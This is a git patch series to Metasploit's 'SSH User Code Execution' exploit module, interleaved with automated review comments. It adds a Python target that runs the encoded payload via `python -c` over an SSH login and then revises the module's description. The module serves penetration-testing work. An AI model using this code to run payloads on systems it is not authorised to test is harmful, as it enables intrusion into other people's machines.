From dfe2bbf1e9fe85ba79c2f4e3f6bc63dd6036be4b Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Wed, 12 Aug 2015 15:46:47 -0400
Subject: [PATCH 1/3] Add a python target to the sshexec module

---
 modules/exploits/multi/ssh/sshexec.rb | 58 ++++++++++++++++----------
 1 file changed, 35 insertions(+), 23 deletions(-)

diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
index fe6d7c1d67..0e708a6f59 100644
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -15,56 +15,62 @@ class Metasploit3 < Msf::Exploit::Remote
 
 def initialize
 super(
- 'Name' => 'SSH User Code Execution',
- 'Description' => %q{
- This module utilizes a stager to upload a base64 encoded
+ 'Name' => 'SSH User Code Execution',
+ 'Description' => %q{
+ This module utilizes a stager to upload an encoded
 binary which is then decoded, chmod'ed and executed from
 the command shell.
 },
- 'Author' => ['Spencer McIntyre', 'Brandon Knight'],
- 'References' =>
+ 'Author' => ['Spencer McIntyre', 'Brandon Knight'],
+ 'References' =>
 [
 [ 'CVE', '1999-0502'] # Weak password
 ],
- 'License' => MSF_LICENSE,
- 'Privileged' => true,
- 'DefaultOptions' =>
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'DefaultOptions' =>
 {
- 'PrependFork' => 'true',
- 'EXITFUNC' => 'process'
+ 'PrependFork' => 'true',
+ 'EXITFUNC' => 'process'
 },
- 'Payload' =>
+ 'Payload' =>
 {
- 'Space' => 4096,
- 'BadChars' => "",
- 'DisableNops' => true
+ 'Space' => 4096,
+ 'BadChars' => "",
+ 'DisableNops' => true
 },
- 'Platform' => %w{ linux osx },
- 'Targets' =>
+ 'Platform' => %w{ linux osx python },
+ 'Targets' =>
 [
 [ 'Linux x86',
 {
- 'Arch' => ARCH_X86,
+ 'Arch' => ARCH_X86,
 'Platform' => 'linux'
 }
 ],
 [ 'Linux x64',
 {
- 'Arch' => ARCH_X86_64,
+ 'Arch' => ARCH_X86_64,
 'Platform' => 'linux'
 }
 ],
 [ 'OSX x86',
 {
- 'Arch' => ARCH_X86,
+ 'Arch' => ARCH_X86,
 'Platform' => 'osx'
 }
+ ],
+ [ 'Python',
+ {
+ 'Arch' => ARCH_PYTHON,
+ 'Platform' => 'python'
+ }
 ]
 ],
- 'CmdStagerFlavor' => %w{ bourne echo printf },
- 'DefaultTarget' => 0,
+ 'CmdStagerFlavor' => %w{ bourne echo printf },
+ 'DefaultTarget' => 0,
 # For the CVE
- 'DisclosureDate' => 'Jan 01 1999'
+ 'DisclosureDate' => 'Jan 01 1999'
 )
 
 register_options(
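Review bot: The new `[ 'Python', { 'Arch' => ARCH_PYTHON, 'Platform' => 'python' } ]` target carries no per-target 'Payload' hash, so it is governed by the module-wide `'Payload' => { 'Space' => 4096, 'BadChars' => "", 'DisableNops' => true }` and the `'PrependFork' => 'true'` default earlier in this hunk, both of which were written for the native cmdstager targets. If a selectable Python payload can exceed 4096 bytes (likely for the larger Python payloads, though that cannot be confirmed from this patch), the space check would reject it for a limit that the `python -c` path does not need; a per-target 'Payload' override on the Python entry would scope the constraint correctly. A short comment on the Python entry, such as `# runs payload.encoded directly via python -c, not through the cmdstager`, would also tell the next maintainer why this target differs from the three native ones.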
@@ -128,6 +134,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
 print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
- execute_cmdstager({:linemax => 500})
+ if target['Platform'] == 'python'
+ execute_command("python -c \"#{payload.encoded}\"")
+ else
+ execute_cmdstager({:linemax => 500})
+ end
+
+ self.ssh_socket.close
 end
 end

From 28fbb7cdde87ac378f2e32c1bebd39aa22d1ae42 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Wed, 12 Aug 2015 16:05:09 -0400
Subject: [PATCH 2/3] Update the description of the sshexec module

---
 modules/exploits/multi/ssh/sshexec.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
index 0e708a6f59..582fd47035 100644
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -17,9 +17,9 @@ class Metasploit3 < Msf::Exploit::Remote
 super(
 'Name' => 'SSH User Code Execution',
 'Description' => %q{
- This module utilizes a stager to upload an encoded
- binary which is then decoded, chmod'ed and executed from
- the command shell.
+ This module connects to the target system and executes the necessary
+ commands to run the specified payload via SSH. If a native payload is
+ specified an appropriate stager will be used.
 },
 'Author' => ['Spencer McIntyre', 'Brandon Knight'],
 'References' =>

From 3bd6c4cee4e00ea6de35ada5386529d4addca021 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Thu, 13 Aug 2015 14:16:09 -0500
Subject: [PATCH 3/3] Add a comma

---
 modules/exploits/multi/ssh/sshexec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
index 582fd47035..51a57cbc44 100644
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
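Review bot: `execute_command("python -c \"#{payload.encoded}\"")` splices the generated Python source into a double-quoted shell word, so any `"`, `$`, backtick or backslash in the payload is consumed by the remote shell instead of reaching python, and the command then fails without any diagnostic; the interpolated value needs shell-safe quoting or escaping before it is sent, and the module-wide `'BadChars' => ""` in the first hunk does not rule those characters out. Separately, the new `self.ssh_socket.close` runs only on the success path: if `execute_command` or `execute_cmdstager` raises, the SSH session stays open, so the close belongs in an `ensure` wrapped around the `if`/`else` block. The start of this method and the definition of `execute_command` are outside the hunk, so it cannot be confirmed here whether `execute_command` waits for the remote process before returning; if it does not, closing the socket immediately afterwards may tear down the channel before the payload has started, which is worth a comment on the `close` line either way.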
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'Description' => %q{
 This module connects to the target system and executes the necessary
 commands to run the specified payload via SSH. If a native payload is
- specified an appropriate stager will be used.
+ specified, an appropriate stager will be used.
 },
 'Author' => ['Spencer McIntyre', 'Brandon Knight'],
 'References' =>